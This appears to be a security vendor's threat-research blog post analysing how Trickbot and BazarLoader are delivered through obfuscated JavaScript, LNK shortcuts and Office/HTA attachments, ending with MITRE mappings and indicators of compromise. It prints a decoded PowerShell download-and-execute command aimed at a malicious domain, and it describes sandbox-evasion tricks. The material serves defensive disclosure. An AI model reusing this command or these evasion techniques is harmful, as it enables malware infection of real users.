The Zscaler ThreatLabz research team monitors thousands of files daily tracking new and pervasive threats, including one of the most prominent banking trojans of the last five years: Trickbot. Trickbot has been active since 2016 and is linked to a large number of malicious campaigns involving bitcoin mining and theft of banking information, personal identifying information (PII), and credentials. BazarLoader is a spinoff of this trojan, developed by the same authors. Both are particularly dangerous as they are easily modifiable and capable of delivering multi-stage payloads, as well as taking over computers entirely.
ThreatLabz has discovered Trickbot operators using new approaches to delivering payloads in recent attack campaigns. The malware samples we analyzed were well-crafted and highly obfuscated with sandbox-evading capabilities. In this blog post, we will show analysis of the different delivery vectors used by Trickbot and BazarLoader.
Key Points:
1. Script and LNK files added evasion techniques to leverage Malware threats.
2. Multilayer obfuscation is used to preclude analysis of JS and LNK files.
3. An Office attachment drops an HTA file with snippets of HTML and javascript functions.
4. Newly registered domains are used to deliver threats.
Trickbot is expanding its range of file types for malware delivery
In previous campaigns, Trickbot payloads were generally dropped as malicious attachments to Microsoft Office files. In the last month, we’ve seen that malware has also used javascript files at a high volume, along with a range of other file formats, as shown in the following charts:
Fig1:Trickbot blocked in the Zscaler Cloud Sandbox
Fig2:BazarLoader blocked in the Zscaler Cloud Sandbox
In this blog, we’ll walk through the attack chain for multiple delivery vectors, including:
- Trickbot spreading through scripting files
- Trickbot spreading through LNK files
- BazarLoader spreading through Office attachments
Trickbot spreading through scripting files
Trickbot gains intrusion using spam emails bundled with malicious javascript attachments, such as the following:
Fig3:Spam email attachment
In this case, the Javascript [5B606A5495A55F2BD8559778A620F21B] file has three layers of obfuscation that are mostly used to evade and bypass sandbox environments. Below is the snapshot of the first obfuscated layer:
Fig4:First layer of obfuscation in javascript
In addition to taking extreme effort to make javascript files highly obfuscated, the malware authors have also added large amounts of junk code to the end to make debugging more difficult. The junk code is just random generated obfuscated strings that do not play any role with the malicious code.
Fig5:Junk code to make analysis difficult
Using the eval() function we have de-obfuscated the second layer in which malicious code is embedded with more junk code. After removing this layer of junk code, the eval() function is used once again to retrieve the final layer of code. We can see that the Trickbot authors used the setTimeout() method, which evaluates an expression after a 967 milliseconds to delay execution in the sandbox. This helps the malware evade sandbox environments.
Fig6: Second layer of obfuscation in javascript
In the above snapshot we are able to see the replace method implemented in the code where “"hdBDJ" and “tSJVh” strings are removed from the variables “YHPhEFtKjqbCmAZ” and “kVYJOrLSqvdAWnaGTX” respectively to get the final string.
Fig7:Final layer
The malicious Javascript executes cmd.exe as a child process, then cmd.exe executes powershell.exe to download Trickbot as payload.
Flow of execution:
Wscript.exe ->cmd.exe->powershell.exe
Powershell.exe embedded with base64 encoded command and after decoded following command is:
IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")
Fig8:Zscaler Cloud Sandbox detection of Javascript Downloader
Trickbot spreading through LNK files
Windows LNK (LNK) extensions are usually seen by users as shortcuts, and we have frequently observed cybercriminals using LNK files to download malicious files such as Trickbot. Trickbot hides the code in the argument section under the properties section of the LNK file. The malware author added extra spaces in between the malicious code to attempt to make it more difficult for researchers to debug the code. We’ve seen this technique used previously in the Emotet campaign using malicious Office attachments in 2018.
Fig9:Code embedded in the properties section of LNK
Downloading Trickbot :
- LNK downloads the file from 45.148.121.227/images/readytunes.png using a silent argument so that the user is not able to see any error message or progress action.
- After downloading, the malware saves the file to the Temp folder with the name application1_form.pdf.
- Finally, the file is renamed from application1_form.pdf to support.exe and executed. Here, support.exe is Trickbot.
Fig10:Zscaler Cloud Sandbox detection of LNK Downloader
BazarLoader spreading through Office attachments
This is one of the other techniques used in TA551 APT aka Shathak. Malicious office documents drop the HTA file to “C\ProgramData\sda.HTA”. This HTA file contains HTML and vbscript designed to retrieve a malicious DLL to infect a vulnerable Windows host with BazarLoader.
Once macro-enabled, the mshta.exe process executes to download a payload. This campaign has been observed delivering BazarLoader and Trickbot in the past.
Fig11:Attack chain of DOC file to download BazarLoader
Base64 encoded data is implemented in the HTML <div> tag which is used later with javascript.
Fig12:Dropped HTA file : Malicious base64 encoded under HTML <div> section
Below is the snapshot of decode base64 data in which we can see it downloading the payload and saving as friendIFriend,jpg to the victim machine:
Fig13:Dropped HTA file : Decode Base64 data
Networking : C&C to download BazarLoader
Fig14:Sending request to download BazarLoader
We have also observed newly registered domains (NRDs) specifically created to distribute these payloads, using a stealer delivered through spam email and bundled with a malicious Microsoft Office attachment.
Fig15: Newly registered domain
Fig16:Zscaler Cloud Sandbox detection of Malicious Office file Downloader
MITRE ATT&CK
|
T5190 |
Gather Victim Network Information |
|
T1189 |
Drive-by Compromise |
|
T1082 |
System Information Discovery |
|
T1140 |
Deobfuscate/Decode Files or Information |
|
T1564 |
Hide Artifacts |
|
T1027 |
Obfuscated Files or Information |
Indicators of Compromise
|
Md5 |
Filename |
FileType |
|
B79AA1E30CD460B573114793CABDAFEB |
100.js |
JS |
|
AB0BC0DDAB99FD245C8808D2984541FB |
4821.js |
JS |
|
192D054C18EB592E85EBF6DE4334FA4D |
4014.js |
JS |
|
21064644ED167754CF3B0C853C056F54 |
7776.js |
JS |
|
3B71E166590CD12D6254F7F8BB497F5A |
7770.js |
JS |
|
5B606A5495A55F2BD8559778A620F21B |
68.js |
JS |
|
BA89D7FC5C4A30868EA060D526DBCF56 |
Subcontractor Reviews (Sep 2021).lnk |
LNK |
|
Md5 |
Filename |
Filetype |
|
C7298C4B0AF3279942B2FF630999E746 |
a087650f65f087341d07ea07aa89531624ad8c1671bc17751d3986e503bfb76.bin.sample.gz |
DOC |
|
3F06A786F1D4EA3402A3A23E61279931 |
- |
DOC |
Associated URLs:
jolantagraban.pl/log/57843441668980/dll/assistant.php
blomsterhuset-villaflora.dk/assistant.php
d15k2d11r6t6rl.cloudfront.net/public/users/beefree
C&C:
|
Domain |
Payload |
|
jolantagraban.pl |
Trickbot |
|
glareestradad.com |
BazarLoader |
|
francopublicg.com |
BazarLoader |
